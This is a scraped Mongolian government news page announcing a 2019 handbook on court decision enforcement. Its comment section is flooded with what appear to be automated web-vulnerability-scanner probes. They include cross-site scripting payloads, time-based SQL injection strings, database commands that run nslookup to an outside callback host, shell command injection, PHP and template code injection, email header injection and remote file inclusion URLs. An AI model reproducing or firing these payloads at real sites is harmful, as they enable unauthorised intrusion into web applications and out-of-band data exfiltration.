ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

Шийдвэр гүйцэтгэх ажиллагааны гарын авлага хэвлэгдэн гарлаа
Нийтлэгдсэн 2019-06-04 12:22:40 | Үзсэн: 1

ШШГЕГ-ын Шийдвэр гүйцэтгэх албанаас ”Шийдвэр гүйцэтгэгчдийн III нэгдсэн зөвлөгөөн”-д зориулж эрх зүйн зохицуулалтыг нэг мөр ойлголтоор хэрэгжүүлэх, шийдвэр гүйцэтгэх ажиллагааг мэргэжлийн удирдлагаар хангах, тодорхой төрлийн ажиллагаатай холбоотой шүүхээр хянан шийдвэрлэгдсэн гомдол, нэхэмжлэл, тэдгээрт хамаарах шүүхийн шийдвэрүүдийг тухайн ажиллагааны онцлогт нийцүүлэн төсөөтэй хэлбэрээр жишээ болгон тусгасан “Иргэний, захиргааны, зөрчлийн шүүхийн шийдвэр гүйцэтгэх ажиллагаа” гарын авлагын номыг гаргалаа.

            Энэхүү гарын авлагын номыг ахлах шийдвэр гүйцэтгэгч, шийдвэр гүйцэтгэгчид болон шүүхийн шийдвэр гүйцэтгэх эрх зүйн чиглэлээр суралцаж буй оюутан-сонсогчдоос эрх зүйн мэдлэгээ дээшлүүлэх, хуулийн зохицуулалтыг нэг мөр ойлголтоор хэрэгжүүлэхэд  ашиглахад ач холбогдолтой юм.

2019-06-04 12:22:40
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20DBTWR[!+!]
2019-06-04 12:22:40
sjpxifkf :
207DOOP ymwz(9835)
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20}body{acu:Expre/**/SSion(ymwz(9352))}
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
[url=http://www.vulnweb.com][/url]
2019-06-04 12:22:40
sjpxifkf :
2019-06-04 12:22:40
sjpxifkf :
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
2019-06-04 12:22:40
sjpxifkf :
20<ScRiPt>ymwz(9821)</sCripT>
2019-06-04 12:22:40
sjpxifkf :
20\u003CScRiPt\ymwz(9816)\u003C/sCripT\u003E
2019-06-04 12:22:40
sjpxifkf :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289871%29%3C%2F%73%43%72%69%70%54%3E
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20
2019-06-04 12:22:40
sjpxifkf :
20ymwz(9662)
2019-06-04 12:22:40
sjpxifkf :
20ymwz(9493)
2019-06-04 12:22:40
sjpxifkf :
20ymwz(9685)
2019-06-04 12:22:40
sjpxifkf :
20VPEVE[!+!]
2019-06-04 12:22:40
sjpxifkf :
20ymwz(9284)
2019-06-04 12:22:40
sjpxifkf :
{{10000269*10000282}}
2019-06-04 12:22:40
sjpxifkf :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-06-04 12:22:40
sjpxifkf :
acux2239z1z2abcxuca2239
2019-06-04 12:22:40
sjpxifkf :
acu8479<s1﹥s2ʺs3ʹuca8479
2019-06-04 12:22:40
sjpxifkf :
209529105
2019-06-04 12:22:40
sjpxifkf :
'"()&%ymwz(9299)
2019-06-04 12:22:40
sjpxifkf :
20'"()&%ymwz(9650)
2019-06-04 12:22:40
sdcteecj :
1acuKtmsmD0wRw
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20EXMAA[!+!]
2019-06-04 12:22:40
fuvcaenx :
203tL31 Rr0F(9317)
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20}body{acu:Expre/**/SSion(Rr0F(9174))}
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
[url=http://www.vulnweb.com][/url]
2019-06-04 12:22:40
fuvcaenx :
2019-06-04 12:22:40
fuvcaenx :
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
2019-06-04 12:22:40
fuvcaenx :
20<ScRiPt>Rr0F(9922)</sCripT>
2019-06-04 12:22:40
fuvcaenx :
20\u003CScRiPt\Rr0F(9217)\u003C/sCripT\u003E
2019-06-04 12:22:40
fuvcaenx :
%32%30%3C%53%63%52%69%50%74%20%3E%52%72%30%46%289608%29%3C%2F%73%43%72%69%70%54%3E
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20
2019-06-04 12:22:40
fuvcaenx :
20Rr0F(9533)
2019-06-04 12:22:40
fuvcaenx :
20Rr0F(9849)
2019-06-04 12:22:40
fuvcaenx :
20Rr0F(9076)
2019-06-04 12:22:40
fuvcaenx :
20DRKYV[!+!]
2019-06-04 12:22:40
oxpcfgjs :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-261.85.4641a.\1.bxss.me
2019-06-04 12:22:40
oxpcfgjs :
930'
2019-06-04 12:22:40
oxpcfgjs :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-258.85.4641a.\1.bxss.me'
2019-06-04 12:22:40
oxpcfgjs :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-257.85.4641a.1.bxss'||'.me')||'
2019-06-04 12:22:40
oxpcfgjs :
Wwr731PY'));select pg_sleep(3); --
2019-06-04 12:22:40
oxpcfgjs :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-255.85.4641a.1.bxss'||'.me')
2019-06-04 12:22:40
oxpcfgjs :
ojefYsWY');select pg_sleep(3); --
2019-06-04 12:22:40
fuvcaenx :
20Rr0F(9695)
2019-06-04 12:22:40
oxpcfgjs :
-1));select pg_sleep(3); --
2019-06-04 12:22:40
oxpcfgjs :
NmnxZOyB';select pg_sleep(3); --
2019-06-04 12:22:40
oxpcfgjs :
-1);select pg_sleep(3); --
2019-06-04 12:22:40
fuvcaenx :
{{9999176*9999109}}
2019-06-04 12:22:40
oxpcfgjs :
-1;select pg_sleep(9); --
2019-06-04 12:22:40
fuvcaenx :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-06-04 12:22:40
oxpcfgjs :
1 waitfor delay '0:0:9' --
2019-06-04 12:22:40
oxpcfgjs :
n8VK5Ust'; waitfor delay '0:0:9' --
2019-06-04 12:22:40
lxxvoyig :
''""
2019-06-04 12:22:40
oxpcfgjs :
-1); waitfor delay '0:0:9' --
2019-06-04 12:22:40
oxpcfgjs :
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
2019-06-04 12:22:40
oxpcfgjs :
-1; waitfor delay '0:0:9' --
2019-06-04 12:22:40
fuvcaenx :
acux6546z1z2abcxuca6546
2019-06-04 12:22:40
oxpcfgjs :
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
2019-06-04 12:22:40
lxxvoyig :
@@iLJli
2019-06-04 12:22:40
oxpcfgjs :
-1 OR 2+981-981-1=0+0+0+1
2019-06-04 12:22:40
lxxvoyig :
JyI=
2019-06-04 12:22:40
oxpcfgjs :
-1 OR 3+981-981-1=0+0+0+1
2019-06-04 12:22:40
oxpcfgjs :
-1 OR 3+793-793-1=0+0+0+1 --
2019-06-04 12:22:40
oxpcfgjs :
-1 OR 2+793-793-1=0+0+0+1 --
2019-06-04 12:22:40
fuvcaenx :
acu3861<s1﹥s2ʺs3ʹuca3861
2019-06-04 12:22:40
oxpcfgjs :
1*1*1*20
2019-06-04 12:22:40
oxpcfgjs :
1*1*1*20
2019-06-04 12:22:40
fuvcaenx :
209712116
2019-06-04 12:22:40
oxpcfgjs :
1*1*1*20
2019-06-04 12:22:40
oxpcfgjs :
4jmnZqpJ
2019-06-04 12:22:40
oxpcfgjs :
1*1*1*20
2019-06-04 12:22:40
fuvcaenx :
'"()&%Rr0F(9104)
2019-06-04 12:22:40
fuvcaenx :
20'"()&%Rr0F(9729)
2019-06-04 12:22:40
bmljyhqq :
news/.
2019-06-04 12:22:40
sgecoopj :
2019-06-04 12:22:40
bmljyhqq :
news
2019-06-04 12:22:40
fttxnayg :
/www.vulnweb.com
2019-06-04 12:22:40
emeretrr :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-06-04 12:22:40
ihqtroya :
${@print(md5(acunetix_wvs_security_test))}\
2019-06-04 12:22:40
ihqtroya :
";print(md5(acunetix_wvs_security_test));$a="
2019-06-04 12:22:40
drqlqxgv :
http://hitZBf91bARf8.bxss.me/
2019-06-04 12:22:40
ihqtroya :
${@print(md5(acunetix_wvs_security_test))}
2019-06-04 12:22:40
ihqtroya :
';print(md5(acunetix_wvs_security_test));$a='
2019-06-04 12:22:40
ihqtroya :
;print(md5(acunetix_wvs_security_test));
2019-06-04 12:22:40
wleabnpt :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-06-04 12:22:40
lekqkxyw :
^(#$!@#$)(()))******
2019-06-04 12:22:40
lekqkxyw :
!(()&&!|*|*|
2019-06-04 12:22:40
lapmrkdb :
'"()
2019-06-04 12:22:40
dxpemtyw :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-06-04 12:22:40
dxpemtyw :
testasp.vulnweb.com
2019-06-04 12:22:40
dxpemtyw :
Http://testasp.vulnweb.com/t/fit.txt
2019-06-04 12:22:40
dxpemtyw :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-06-04 12:22:40
sxxtxacl :
${9999846+9999579}
2019-06-04 12:22:40
imircfkr :
20&n930819=v901289
2019-06-04 12:22:40
nmvnnohb :
to@example.com> bcc:013405.85-228.85.4641a.1@bxss.me
2019-06-04 12:22:40
nmvnnohb :
20 bcc:013405.85-227.85.4641a.1@bxss.me
2019-06-04 12:22:40
fgegfqrn :
CSlMYt1N
2019-06-04 12:22:40
tcspahjy :
$(nslookup dns.ce.\013405.85-216.85.4641a.\1.bxss.me)
2019-06-04 12:22:40
tcspahjy :
&nslookup dns.ce.\013405.85-218.85.4641a.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-218.85.4641a.\1.bxss.me&`'
2019-06-04 12:22:40
tcspahjy :
set|set&set
2019-06-04 12:22:40
vtfunlqj :
20
2019-06-04 12:22:40
vtfunlqj :
20'>">
2019-06-04 12:22:40
retsoage :
"+response.write(9030113*9885219)+"
2019-06-04 12:22:40
retsoage :
response.write(9030113*9885219)
2019-06-04 12:22:40
retsoage :
'+response.write(9030113*9885219)+'
2019-06-04 12:22:40
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр